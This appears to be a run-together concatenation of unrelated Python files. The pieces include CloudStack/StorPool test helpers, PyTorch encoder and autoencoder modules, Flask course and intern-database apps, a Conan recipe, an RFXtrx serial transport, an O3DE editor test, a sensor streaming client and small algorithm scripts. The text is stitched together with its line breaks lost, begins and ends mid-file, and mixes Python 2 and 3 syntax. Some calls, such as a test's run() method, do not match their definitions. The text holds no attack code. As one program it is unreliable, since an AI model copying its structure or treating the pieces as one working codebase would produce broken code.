cmd.clusterid = clusterid return(cls.apiclient.listHosts(cmd)) def start(cls, vmid, hostid): """Start the instance""" cmd = startVirtualMachine.startVirtualMachineCmd() cmd.id = vmid cmd.hostid = hostid return (cls.apiclient.startVirtualMachine(cmd)) @classmethod def create_template_from_snapshot(self, apiclient, services, snapshotid=None, volumeid=None): """Create template from Volume""" # Create template from Virtual machine and Volume ID cmd = createTemplate.createTemplateCmd() cmd.displaytext = "StorPool_Template" cmd.name = "-".join(["StorPool-", random_gen()]) if "ostypeid" in services: cmd.ostypeid = services["ostypeid"] elif "ostype" in services: # Find OSTypeId from Os type sub_cmd = listOsTypes.listOsTypesCmd() sub_cmd.description = services["ostype"] ostypes = apiclient.listOsTypes(sub_cmd) if not isinstance(ostypes, list): raise Exception( "Unable to find Ostype id with desc: %s" % services["ostype"]) cmd.ostypeid = ostypes[0].id else: raise Exception( "Unable to find Ostype is required for creating template") cmd.isfeatured = True cmd.ispublic = True cmd.isextractable = False if snapshotid: cmd.snapshotid = snapshotid if volumeid: cmd.volumeid = volumeid return Template(apiclient.createTemplate(cmd).__dict__) @classmethod def getCfgFromUrl(cls, url): cfg = dict([ option.split('=') for option in url.split(';') ]) host, port = cfg['SP_API_HTTP'].split(':') auth = cfg['SP_AUTH_TOKEN'] return host, int(port), auth <filename>nhl/conference.py """ Module containing NHL conference objects """ from dataclasses import dataclass from .flyweight import Flyweight @dataclass(frozen=True) class Conference(Flyweight): """ NHL conference object. This is the detailed docstring. """ __slots__ = ["id", "name", "name_short", "abbreviation"] _instances = {} id: int """int: The NHL statsapi universal conference ID""" name: str """str: Conference name""" name_short: str """str: Conference name shortened""" abbreviation: str """str: Conference abbreviation""" @classmethod def _key(cls, id, *args, **kwargs): return id @classmethod def has_key(cls, id): return super().has_key(id) @classmethod def from_key(cls, id): return super().from_key(id) def __repr__(self): return "<nhl.Conference: {}, ID {}>".format(self.name, self.id) t= int(input()) while(t>0): l=list(map(int,input().split(' '))) a=l[0] b=l[1] c=pow(2,a,1000000007)-1 print(pow(c,b,1000000007)) t=t-1<gh_stars>0 import torch import torch.nn as nn from utils.utils_temp import AttrProxy class ImageEncoder(nn.Module): def __init__(self, input_channels, output_channels, conv_kernel_size, pool_kernel_size, embedding_dim, hop, dropout): super(ImageEncoder, self).__init__() self.input_channels = input_channels self.output_channels = output_channels self.conv_kernel_size = conv_kernel_size self.pool_kernel_size = pool_kernel_size self.max_hops = hop self.dropout = dropout self.dropout_layer = nn.Dropout(dropout) self.C = nn.Conv2d(input_channels, output_channels, conv_kernel_size) # need to add BN and Relu layer. self.relu = nn.ReLU() self.avgpool = nn.AdaptiveAvgPool2d(pool_kernel_size) # need to add a Flatten() layer ? self.fc = nn.Linear(2304, embedding_dim) # need to check this logic and make sure the pool_output_size. self.softmax = nn.Softmax(dim=1) def forward(self, image_arr, hidden): u = [hidden.squeeze(0)] image_arr_size = image_arr.size() batch_size = int(image_arr_size[0]) embed_A = self.C(image_arr.contiguous().view([image_arr_size[0] * image_arr_size[1]] + list(image_arr_size[2:]))) # need to check the logic clearly. embed_A = self.relu(embed_A) embed_A = self.avgpool(embed_A) embed_A = torch.flatten(embed_A, 1) embed_A = self.fc(embed_A) embed_A = embed_A.view([batch_size, int(embed_A.size()[0] / batch_size)] + list(embed_A.size()[1:])) u_temp = u[-1].unsqueeze(1).expand_as(embed_A) prob_logit = torch.sum(embed_A * u_temp, 2) prob_ = self.softmax(prob_logit) prob = prob_.unsqueeze(2).expand_as(embed_A) ret = torch.sum(embed_A * prob, 1) # ret = torch.cat((embed_A[:, 0, :], embed_A[:, 1, :]), dim=1) return retimport pytest import numpy as np @pytest.fixture def SimpleVectorValuedFunction(xs: np.ndarray): """A simple vector valued function for testing. Args: xs (np.ndarray): A 2D numpy array with argument vectors as its rows. Each vector consists of four values. Returns: np.ndarray: A 2D array with function evaluation results for each of the argument vectors on its rows. Each row contains three values. """ f1 = xs[:, 0] + xs[:, 1] f2 = xs[:, 1] - xs[:, 2] f3 = xs[:, 2] * xs[:, 3] return np.vstack((f1, f2, f3)).T if __name__ == "__main__": xs = np.array([[1, 2, 3, 4], [9, 8, 7, 6], [1, 5, 7, 3]]) print(SimpleVectorValuedFunction(xs)) <gh_stars>0 # -*- coding: utf-8 -*- import functools, os from flask import ( Blueprint, flash, g, redirect, render_template, request, session, url_for, json, current_app ) #from werkzeug.security import check_password_hash, generate_password_hash #from ddgatve.db import get_db bp = Blueprint('numtheory', __name__, url_prefix='/numtheory') local_tales = [ { 'id':'NumTh.ArithmProgressions', 'dir':'tale-numtheory-arithm-progressions', 'title': u'Aritmētiskas progresijas' }, { 'id':'NumTh.GeomProgressions', 'dir':'tale-numtheory-geom-progressions', 'title': u'Ģeometriskas progresijas' }, { 'id':'NumTh.PeriodicSequences', 'dir':'numtheory-recurrence-relation', 'title': u'Rekurentu virkņu periodiskums' }, { 'id':'NumTh.Grade10', 'dir':'tale-numtheory-grade10', 'title': u'10.klases mix' }, { 'id':'Comb.GamesSymmetry', 'dir':'tale-numtheory-games-symmetry', 'title': u'Simetrija spēlēs' }, { 'id':'NumTh.Multiplicative', 'dir':'tale-numtheory-multiplicative', 'title': u'Multiplikatīva teorija (pārtaisāms)', 'date': '2019-06-10' } ] global_tales = [ { 'id':'NumTh.JunIntro', 'dir':'tale-numtheory-jun-intro', 'title': u'Jun00: Ievadlekcija', 'date': '2019-09-14' }, { 'id':'NumTh.Jun01', 'dir':'tale-numtheory-jun01-divisibility', 'title': u'Jun01: Pirmskaitļi un dalāmība', 'date': '2019-09-28' }, # { # 'id':'NumTh.Jun03', # 'dir':'tale-numtheory-jun02-congruences', # 'title': u'Jun02: Modulārā aritmētika', # 'date': '2019-09-28', # 'nolink' : 'True' # }, { 'id':'NumTh.Jun02', 'dir':'tale-numtheory-jun03-crt', 'title': u'Jun02: Ķīniešu atlikumu teorēma', 'date': '2019-12-14' } # { # 'id':'NumTh.Jun04', # 'dir':'tale-numtheory-jun04-valuations', # 'title': u'Jun04: Valuācijas', # 'date': '2019-12-14', # 'nolink': 'True' # } ] exam_lst = [ { 'id':'G10.ALG', 'dir':'exam-numtheory-algebra', 'title': u'Algebras prasmes' }, { 'id':'G10.MOD', 'dir':'exam-numtheory-modular-arithmetic', 'title': u'Modulārās aritmētikas prasmes' } ] @bp.route('/index', methods=['GET', 'POST']) def index(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'index', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/index.html', **template_context) @bp.route('/assignments', methods=['GET','POST']) def assignments(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'assignments', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/assignments.html', **template_context) @bp.route('/slides', methods=['GET','POST']) def slides(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'local_tales': local_tales, 'global_tales': global_tales, 'my_id': 'slides', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/slides.html', **template_context) @bp.route('/exams', methods=['GET','POST']) def algorithms(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'lst_comp': exam_lst, 'my_id': 'exams', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/exams.html', **template_context) @bp.route('/references', methods=['GET','POST']) def submissions(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'references', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/references.html', **template_context) <gh_stars>1-10 from conans import ConanFile, CMake, tools class LumaAvConan(ConanFile): name = "luma_av" version = "0.0.0" license = "<Put the package license here>" author = "<Put your name here> <And your email here>" url = "<Package recipe repository url here, for issues about the package>" description = "<Description of Lumaav here>" topics = ("<Put some tag here>", "<here>", "<and here>") settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False]} default_options = { "shared": False, "ffmpeg:with_opus": False, "ffmpeg:with_libalsa": False, "gtest:build_gmock": False } generators = "cmake", "cmake_find_package" exports_sources = "src/*", "test/*", "CMakeLists.txt" def requirements(self): self.requires("outcome/2.1.5") self.requires("ffmpeg/4.4") self.requires("zlib/1.2.11@conan/stable") self.requires("bzip2/1.0.8@conan/stable") self.requires("gtest/1.11.0") def build(self): cmake = CMake(self) cmake.configure() cmake.build() def package(self): self.copy("*.hpp", dst="include", src="hello") self.copy("*.so", dst="lib", keep_path=False) self.copy("*.a", dst="lib", keep_path=False) def package_info(self): self.cpp_info.libs = ["luma_av"] <reponame>eeishaan/ift6759-block2 import torch from torch import nn class CDAutoEncoder(nn.Module): r""" Convolutional denoising autoencoder layer for stacked autoencoders. This module is automatically trained when in model.training is True. Args: input_size: The number of features in the input output_size: The number of features to output stride: Stride of the convolutional layers. """ def __init__(self, input_size, output_size, stride): super(CDAutoEncoder, self).__init__() self.forward_pass = nn.Sequential( nn.Conv2d(input_size, output_size, kernel_size=2, stride=stride, padding=0), nn.ReLU(), ) self.backward_pass = nn.Sequential( nn.ConvTranspose2d(output_size, input_size, kernel_size=2, stride=stride, padding=0), nn.ReLU(), ) self.criterion = nn.MSELoss() self.optimizer = torch.optim.SGD(self.parameters(), lr=0.1) self.current_loss = 0 def forward(self, x): # Train each autoencoder individually x = x.detach() # Add noise, but use the original lossless input as the target. x_noisy = x * (x.data.new(x.size()).normal_(0, 0.1) > -.1).type_as(x) y = self.forward_pass(x_noisy) if self.training: x_reconstruct = self.backward_pass(y) x.requires_grad = False loss = self.criterion(x_reconstruct, x) self.current_loss = loss self.optimizer.zero_grad() loss.backward() self.optimizer.step() return y.detach() def reconstruct(self, x): return self.backward_pass(x) class CAES(nn.Module): r""" A stacked autoencoder made from the convolutional denoising autoencoders. Each autoencoder is trained independently and at the same time. """ def __init__(self): super(CAES, self).__init__() self.ae1 = CDAutoEncoder(3, 16, 2) self.ae2 = CDAutoEncoder(16, 32, 2) self.ae3 = CDAutoEncoder(32, 64, 2) self.ae4 = CDAutoEncoder(64, 32, 2) self.ae5 = CDAutoEncoder(32, 16, 2) def forward(self, x): a1 = self.ae1(x) a2 = self.ae2(a1) a3 = self.ae3(a2) a4 = self.ae4(a3) a5 = self.ae5(a4) if self.training: return a5 else: return a5, self.reconstruct(a5) def reconstruct(self, x): a4_reconstruct = self.ae5.reconstruct(x) a3_reconstruct = self.ae4.reconstruct(a4_reconstruct) a2_reconstruct = self.ae3.reconstruct(a3_reconstruct) a1_reconstruct = self.ae2.reconstruct(a2_reconstruct) x_reconstruct = self.ae1.reconstruct(a1_reconstruct) return x_reconstruct def get_loss(self): return self.ae1.current_loss + self.ae2.current_loss + self.ae3.current_loss + self.ae4.current_loss + self.ae5.current_loss def embedding(self, x): self.eval() with torch.no_grad(): embedding, _ = self.forward(x) embedding = embedding.view(embedding.shape[0], -1) self.train() return embedding.cpu().numpy() <filename>arwn/vendor/RFXtrx/pyserial.py # This file is part of pyRFXtrx, a Python library to communicate with # the RFXtrx family of devices from http://www.rfxcom.com/ # See https://github.com/woudt/pyRFXtrx for the latest version. # # Copyright (C) 2012 <NAME> <<EMAIL>> # # pyRFXtrx is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # pyRFXtrx is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with pyRFXtrx. See the file COPYING.txt in the distribution. # If not, see <http://www.gnu.org/licenses/>. """ This module provides a transport for PySerial """ import logging from serial import Serial from time import sleep from . import RFXtrxTransport logger = logging.getLogger(__name__) class PySerialTransport(RFXtrxTransport): """ Implementation of a transport using PySerial """ def __init__(self, port, debug=False): self.serial = Serial(port, 38400, timeout=0.1) self.debug = debug def receive_blocking(self): """ Wait until a packet is received and return with an RFXtrxEvent """ while True: data = self.serial.read() if (len(data) > 0): pkt = bytearray(data) data = self.serial.read(pkt[0]) pkt.extend(bytearray(data)) if self.debug: logger.debug( "Recv: " + " ".join("0x{0:02x}".format(x) for x in pkt)) return self.parse(pkt) def send(self, data): """ Send the given packet """ if isinstance(data, bytearray): pkt = data elif isinstance(data, str) or isinstance(data, bytes): pkt = bytearray(data) else: raise ValueError("Invalid type") if self.debug: logger.debug( "Send: " + " ".join("0x{0:02x}".format(x) for x in pkt)) self.serial.write(pkt) def reset(self): """ Reset the RFXtrx """ self.send('\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') sleep(0.3) # Should work with 0.05, but not for me self.serial.flushInput() self.send('\x0D\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00') # self.send('\x0D\x00\x00\x03\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00') return self.receive_blocking() """ Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution. SPDX-License-Identifier: Apache-2.0 OR MIT Non-Material based assets excluded from Browser import azlmbr.materialeditor will fail with a ModuleNotFound error when using this script with Editor.exe This is because azlmbr.materialeditor only binds to MaterialEditor.exe and not Editor.exe You need to launch this script with MaterialEditor.exe in order for azlmbr.materialeditor to appear. """ import os import sys from PySide2 import QtWidgets import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devassets, "Gem", "PythonTests")) from editor_python_test_tools import pyside_utils from Automated.atom_utils.material_editor_utils import MaterialEditorHelper class NonMaterialAssetsExcludedInBrowserTest(MaterialEditorHelper): def __init__(self): MaterialEditorHelper.__init__(self, log_prefix="NonMaterialAssetsExcludedInBrowser_test_case") def run_test(self): """ Summary: Non-Material based assets are excluded from Browser. Test Steps: 1) Initialize QT objects 2) Browse through paths and validate if expected items are present and exluded extensions are not present Expected Result: Only expected files like .fbx, .material should be shown in browser, other files like .txt or .json should not be shown in Asset Browser :return: None """ # 1) Initialize QT objects editor_window = pyside_utils.get_editor_main_window() asset_browser = self.get_asset_browser(editor_window) tree = asset_browser.findChild(QtWidgets.QTreeView, "m_assetBrowserTreeViewWidget") # 2) Browse through paths and validate if expected items are present and exluded extensions are not present tree.expandAll() self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "LightingPresets"), "greenwich_park_03_2k_cm.exr", ) self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "Materials", "StandardPbrTestCases"), "001_DefaultWhite.material", ) self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "Multi-mat_fbx"), "multi-mat_1m_cube.fbx", ) def get_asset_browser(self, editor_window): """ Opens the Asset Browser if not opened already and returns the Qt object of Asset Browser :param editor_window - editor_window Qt object :return asset_browser - Qt object """ asset_browser = self.get_asset_browser_dock_widget(editor_window) if asset_browser is None or not asset_browser.isVisible(): action = pyside_utils.find_child_by_pattern(editor_window, {"iconText": "Asset Browser"}) action.trigger() self.wait_for_condition(lambda: self.get_asset_browser_dock_widget(editor_window) is not None) asset_browser = self.get_asset_browser_dock_widget(editor_window) return asset_browser def get_asset_browser_dock_widget(self, editor_window): """ Returns the Qt object of Asset Browser :param editor_window - editor_window Qt object :return asset_browser - Qt object (QDockWidget) """ return editor_window.findChild(QtWidgets.QDockWidget, "Asset Browser_DockWidget") def browse_validate_assets(self, tree, path_to_verify, allowed_item): """ Iterates each item of a folder under a given path and verifies if an item is present. Also verifies if any item ends with ".txt" or ".json". Log statements are printed accordingly. :param path_to_verify: Path in which items need to be browsed. Ex: ("Gems", "Atom", "AtomTestData", "TestData", "LightingPresets") :param allowed_item: Specific item to verify inside folder. Ex: 001_DefaultWhite.material. :return: None """ # Get the Model index for the path in which we need to verify assets model_index = pyside_utils.find_child_by_hierarchy(tree, *path_to_verify) # If path is invalid, print message accordingly if model_index is None: # NOTE: This does not necessarily mean that the functionality is not working as expected, # this may happen when the actual paths are updated, but this script is not updated, added the below # line to unexpected lines, so test would fail if that is the case, so that paths can be updated. print(f"Atom MaterialEditor asset path not found in browser: {path_to_verify}") return # else scroll in Asset Browser until we get to the folder tree.scrollTo(model_index) expected_item_found = False excluded_item_found = False model = tree.model() # Iterate through each item under that folder and perform validations for row in range(model.rowCount(model_index)): item_data = model.index(row, 0, model_index).data() if item_data == allowed_item: expected_item_found = True if item_data.endswith(".txt") or item_data.endswith(".json"): excluded_item_found = True # Print results accordingly if not expected_item_found: print(f"Expected item not found in folder {path_to_verify[-1]}") if excluded_item_found: print(f"Excluded item found in folder {path_to_verify[-1]}") test = NonMaterialAssetsExcludedInBrowserTest() test.run() from sys import argv def badclusterdetection(clustername, dataname, goodclusters): clusterfile = open(clustername, 'r') datafile = open(dataname, 'r') goodclusters = int(goodclusters) # process data file to determine which entries are normal # and which are anamolous data = {} line = datafile.readline() while line != '': cleanlinesplit = line.rstrip().split(' ') data[int(cleanlinesplit[0])-2] = cleanlinesplit[1].split(',')[-1] line = datafile.readline() # read clusters from clusterfile totalVertices = 0 clusters = [] line = clusterfile.readline() while line != '': if line != '\n': clusters.append(line.rstrip().split(' ')) totalVertices += len(line.split(' ')) line = clusterfile.readline() # analyze clusters tp = 0 tn = 0 fp = 0 fn = 0 for i,cluster in enumerate(sorted(clusters, key=len, reverse=True)): if i < goodclusters: for vertex in cluster: if data[int(vertex)] == "normal.": tp += 1 else: fp += 1 else: for vertex in cluster: if data[int(vertex)] == "normal.": fn += 1 else: tn += 1 #print analysis print "Positive Clusters:", str(goodclusters) print "Negative Clusters:", str(len(clusters) - goodclusters) print "TP: ", str(tp) print "TN: ", str(tn) print "FP: ", str(fp) print "FN: ", str(fn) print "TPR: ", str(float(tp) / (tp + fp)) print "TNR: ", str(float(tn) / (tn + fn)) print "FPR: ", str(float(fp) / (tp + fp)) print "FNR: ", str(float(fn) / (tn + fn)) print "ACCURACY: ", str((tp + tn) / float(tp + tn + fp + fn)) return (tp + tn) / float(tp + tn + fp + fn) if __name__ == "__main__": filename, clustername, dataname, goodclusters = argv badclusterdetection(clustername, dataname, goodclusters) <filename>python-streaming-client/stream_client.py import httplib from base64 import b64encode from threading import Lock,Thread import re from time import time, sleep from copy import copy from io import BytesIO import matplotlib.image as img import matplotlib.figure as fig import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from Tkinter import * import traceback class StreamClient: """ A sample streaming client for accessing the SensorLogger app multipart streaming """ CHUNK_SIZE = 32768 BUFFER_SIZE = 200000 def __init__(self, host, port=80): self.conn = httplib.HTTPConnection(host, port); self.re_length = re.compile(r".*Content-length: ?([0-9]+).*", re.M | re.S | re.I) self.re_type = re.compile(r"Content-type: ?([a-z]+)/.*", re.M | re.S | re.I) self.re_timestamp = re.compile(r".*X-Timestamp: ?([0-9]+).*", re.M | re.S | re.I) self.buffer = "0"*StreamClient.BUFFER_SIZE self.lock = Lock() self.last_update = 0 self.blen = 0 self.boundary = "" self.callback = None def get(self, callback, get="/", user=None, pw=""): """ Start the get request of the stream :param get: the url to get :param user: the user (for basic authentication) :param pw: the password """ if user is not None: userAndPass = b64encode(b"%s:%s"%(user,pw)).decode("ascii") headers = {'Authorization': 'Basic %s' % userAndPass} self.conn.request("GET", get, headers=headers) else: self.conn.request("GET", get) self.r = self.conn.getresponse() self.boundary = self.r.getheader("content-type") self.boundary = "--" + self.boundary[self.boundary.find("boundary=") + 9:] self.blen = len(self.boundary)+2 self.callback = callback Thread(target=self.read).start() def read(self): """ The reading thread """ print ("START") start = -1 restart = StreamClient.BUFFER_SIZE-StreamClient.CHUNK_SIZE d = self.r.read(StreamClient.CHUNK_SIZE) while d: #print "---------------------------", len(d) #print d self.buffer = self.buffer[StreamClient.CHUNK_SIZE:]+d self.last_update = time() if start<0: start = self.buffer.find(self.boundary, restart) end = self.buffer.find(self.boundary, start+self.blen) while start<end: #print (start, end, self.buffer[end+self.blen:end+100]) all = self.buffer[start+self.blen:end] headers_len = all.find("\r\n\r\n") + 4 headers = all[:headers_len] #print headers try: content_type = self.re_type.match(headers).group(1) timestamp = self.re_timestamp.match(headers).group(1) #print "FOUND: "+content_type, timestamp l = end - start - headers_len - 4 self.callback(timestamp, content_type, all[headers_len:headers_len+l+1]) except Exception as e: print e traceback.print_exc() #print ("ERROR CONTENT TYPE: %s" % headers) timestamp = -1 #try: # l = int(self.re_length.match(headers).group(1)) #finally: # print (all[:min(128,end)]) # print "--------------------------------------------------" start = end end = self.buffer.find(self.boundary, start+self.blen) d = self.r.read(StreamClient.CHUNK_SIZE) start -= StreamClient.CHUNK_SIZE restart = max(0, start, restart-StreamClient.CHUNK_SIZE) class Buffer: def __init__(self, image, data): self.image = image self.data = data self.timestamp = 0 def __copy__(self): return Buffer(self.image, [d[:] for d in self.data]) class StreamBuffer: N_BUFFERS = 5 def __init__(self, len): self.buffers = None self.currentIndex = 0 self.current = None self.len = len self.lock = Lock() self.re = re.compile(r"([a-zA-Z _\-]+[^XYZ]) ?([XYZ])?") self.init_buffers(0) def init_buffers(self, dimension): self.lock.acquire() data = [[0] * self.len for i in range(0, dimension)] self.buffers = [Buffer(None, data) for i in range(0, StreamBuffer.N_BUFFERS)] self.lock.release() def update_image(self, timestamp, image): self.lock.acquire() try: buf = self.buffers[self.currentIndex] buf.timestamp = timestamp buf.image = image finally: self.lock.release() def update_data(self, timestamp, i, values): self.lock.acquire() try: buf = self.buffers[self.currentIndex] buf.timestamp = timestamp for j,v in enumerate(values): buf.data[j][i] = float(v) finally: self.lock.release() def set_headers(self, values): old = "" dim = 0 sensors = [] for v in values: m = self.re.match(v) name = m.group(1) if name != old: if old != "": sensors.append({"name": old, "dimension": dim}) dim = 1 old = name else: dim += 1 sensors.append({"name": name, "dimension": dim}) self.init_buffers(len(values)) return sensors def swap(self): self.lock.acquire() current = self.buffers[self.currentIndex] self.currentIndex = (self.currentIndex + 1) % StreamBuffer.N_BUFFERS self.buffers[self.currentIndex] = copy(current) self.lock.release() return current class SensorDisplay: def __init__(self, name, dimension, length, axis, labels=("X", "Y", "Z", "par1", "par2"), styles=("r-","g-","b-","y-","m-")): self.sensor = name self.dimension = dimension self.labels = labels self.lines = [] axis.set_ylim(-15, 15) axis.set_title(name) for i in range(0, dimension): line, = axis.plot([0] * length, styles[i]) if dimension>1: line.set_label(labels[i]) self.lines.append(line) axis.legend() def set_data(self, data): for i,line in enumerate(self.lines): line.set_ydata(data[i]) class StreamDisplay: """ Create a window with figure (remove this part and the display thread if don't need showing) https://stackoverflow.com/questions/34764535/why-cant-matplotlib-plot-in-a-different-thread """ def __init__(self, buffer): self.buffer = buffer self.window = Tk() self.figure = fig.Figure(figsize=(8, 10)) self.charts = [] def draw(self): buffer = self.buffer.swap() try: if buffer.image is not None: im = img.imread(BytesIO(buffer.image), format=self.img_format) self.image.set_data(im) if len(buffer.data): curr = 0 for chart in self.charts: chart.set_data(buffer.data[curr:curr+chart.dimension]) curr += chart.dimension self.canvas.draw() plt.pause(0.001) except Exception as e: print e #traceback.print_stack() def wait(self): self.window.mainloop() def show(self, sensors=[], img_format="jpg"): # init axes self.sensors = sensors self.img_format = img_format self.image = self.figure.add_subplot(len(sensors)+1,1,1).imshow(img.imread("img.jpg", format=img_format)) axes = [] for i, s in enumerate(sensors): ax = self.figure.add_subplot(len(sensors)+1, 1, i+2, label=s["name"]) self.charts.append(SensorDisplay(s["name"], s["dimension"], self.buffer.len, ax)) # init canvas canvas = FigureCanvasTkAgg(self.figure, master=self.window) canvas.draw() canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) canvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1) self.canvas = canvas # start display thread Thread(name="display", target=self.thread, args=(self, 0.001)).start() def thread(self, display, delay): """ target of display thread """ while True: sleep(delay) display.draw() # do another task with the data # -*- coding: utf-8 -*- """ Created on Mon Sep 7 22:46:33 2020 @author: 91842 """ s = input() m = 0 d = [] for char in s: if char in d: d = d[d.index(char)+1:] d.append(char) print(d) m = max(m, len(d)) print(m)<reponame>Riteme/test from random import * n = 0 n = int(raw_input()) primes = [] marked = [False] * (n + 1) def compute_primes(): global primes global marked marked[0] = True marked[1] = True for i in range(2, n + 1): if not marked[i]: primes.append(i) for p in primes: if i * p > n: break marked[i * p] = True if i % p == 0: break def not_prime(n): BASIS = [2, 7, 61] if n in BASIS: return False def quick_pow(a, b, p): r = 1 while b: if b & 1: r = r * a % p a = a * a % p b >>= 1 return r # 将n - 1分解为2^r * t的形式,t是奇数 r = 0 t = n - 1 while not(t & 1): t >>= 1 r += 1 for b in BASIS: v = quick_pow(b % n, t, n) for i in range(0, r): u = v * v % n if u == 1 and v != 1 and v != n - 1: return True v = u if v != 1: return True return False compute_primes() for i in range(2, n + 1): real = marked[i] test = not_prime(i) # print("i = %s, real = %s, test = %s" % (i, real, test)) if real != test: print("Prime test failed on %s." % (i)) <reponame>z4r4tu5tr4/live-de-quarta # Incluindo Swap from time import sleep from dashing import VGauge, HSplit from psutil import virtual_memory, swap_memory ui = HSplit( # ui HSplit( # ui.items[0] VGauge(title='RAM'), # ui.items[0].items[0] VGauge(title='Swap'), # ui.items[0].items[0] title='Memória', border_color=3 ) ) while True: # # Memoria # RAM ram_tui = ui.items[0].items[0] memoria = virtual_memory().percent ram_tui.title = f'RAM {memoria} %' ram_tui.value = memoria # SWAP swap_tui = ui.items[0].items[1] memoria = swap_memory().percent swap_tui.title = f'SWAP {memoria} %' swap_tui.value = memoria try: ui.display() sleep(.5) except KeyboardInterrupt: break import sqlite3 from sqlite3 import Error import datetime import os from flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify from flask_sqlalchemy import SQLAlchemy def create_connection(db_file): """ create a database connection to the SQLite database specified by db_file :param db_file: database file :return: Connection object or None """ conn = None try: conn = sqlite3.connect(db_file) return conn except Error as e: print(e) return conn def create_table(conn, create_table_sql): """ create a table from the create_table_sql statement :param conn: Connection object :param create_table_sql: a CREATE TABLE statement :return:null """ try: c = conn.cursor() c.execute(create_table_sql) except Error as e: print(e) def drop_table(conn,drop_table_sql): """ Drop possible tables before creating a new opened :param conn: Connection object :param drop_table_sql: a DROP TABLE statement :return: null """ try: c = conn.cursor() c.execute(drop_table_sql) except Error as e: print(e) def create_position(conn, position): """ Create a new position into the positions table :param conn: :param position: :return: null """ sql = ''' INSERT INTO positions(name,description) VALUES(?,?) ''' cur = conn.cursor() cur.execute(sql, position) conn.commit() def create_intern(conn, intern): """ Create a new intern :param conn: :param intern: :return: intern id """ sql = ''' INSERT INTO interns(last_name,first_name,position_applied,school,program,date_of_entry) VALUES(?,?,?,?,?,?) ''' cur = conn.cursor() cur.execute(sql, intern) conn.commit() return cur.lastrowid def create_interns_api(conn, json_data_packet): """ Create a new intern :param conn: :param json_data_packet :return: null """ for i in json_data_packet: intern=(i.get('Applicant Last Name'),i.get('Applicant First Name'),i.get('Position Applied For'),i.get('Applicant School'),i.get('Applicant Degree Program'),datetime.datetime.now()) create_intern(conn,intern) conn.commit() def main(): """ In this main function, we connect to the database, and we create position table and intern table and after that we create new position and new interns and insert the data into the position/intern table """ database = r"interns.db" sql_drop_positions_table=""" DROP TABLE positions """ sql_drop_interns_table=""" DROP TABLE interns """ sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions ( name text PRIMARY KEY, description text ); """ sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns ( id integer PRIMARY KEY, last_name text NOT NULL, first_name text NOT NULL, position_applied text NOT NULL, school text NOT NULL, program text NOT NULL, date_of_entry text NOT NULL, FOREIGN KEY (position_applied) REFERENCES positions (name) ON UPDATE NO ACTION );""" # create a database connection conn = create_connection(database) # create tables if conn is not None: #drop interns table before everything else drop_table(conn, sql_drop_interns_table) #drop positions table before everything else drop_table(conn, sql_drop_positions_table) # create projects table create_table(conn, sql_create_positions_table) # create tasks table create_table(conn, sql_create_interns_table) else: print("Error! cannot create the database connection.") with conn: #create position-later on change the check condition position=("Software Development Intern", "This position is for software development intern"); create_position(conn, position) #create interns: intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now()) intern_2=("C","D","Software Development Intern","GWU","Data Analytics",datetime.datetime.now()) create_intern(conn,intern_1) create_intern(conn,intern_2) conn.commit() conn.close() return database """ From here down is the part that I have not yet finished- showing the values in the database on the webpage and allow user to insert new values into the database via the webpage """ app = Flask(__name__) app.debug = True #app.config['SECRET_KEY'] = 'hard to guess secure key' # setup SQLAlchemy basedir = os.path.abspath(os.path.dirname(__file__)) #app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite') #db = SQLAlchemy(app) db=main() conn = create_connection(db) mycur = conn.cursor() # setup SQLAlchemy @app.route('/') def index(): """ This leads user to the home base page when the app runs """ # return HTML # return "<h1>this is the home page!<h1>" return render_template('home-base.html') @app.route('/positions') def show_all_positions(): """ This leads user to the position page when user clicks on the positions button on the top right and it is supposed to show user all the positions in the database """ db=main() conn = create_connection(db) mycur = conn.cursor() post=mycur.execute("SELECT * FROM positions") #positions = positions.query.all() return render_template('position-all.html', positions=post) @app.route('/position/add', methods=['GET', 'POST']) def add_positions(): """ This leads user to the position adding page when user clicks on the add positions button it is supposed to let user enter and add new positions into the database """ if request.method == 'GET': return render_template('position-add.html') if request.method == 'POST': # get data from the form name = request.form['name'] description = request.form['description'] #position = Position(name=name, description=description) position=(name, description); create_position(conn, position) # insert the data into the database #db.session.add(position) return 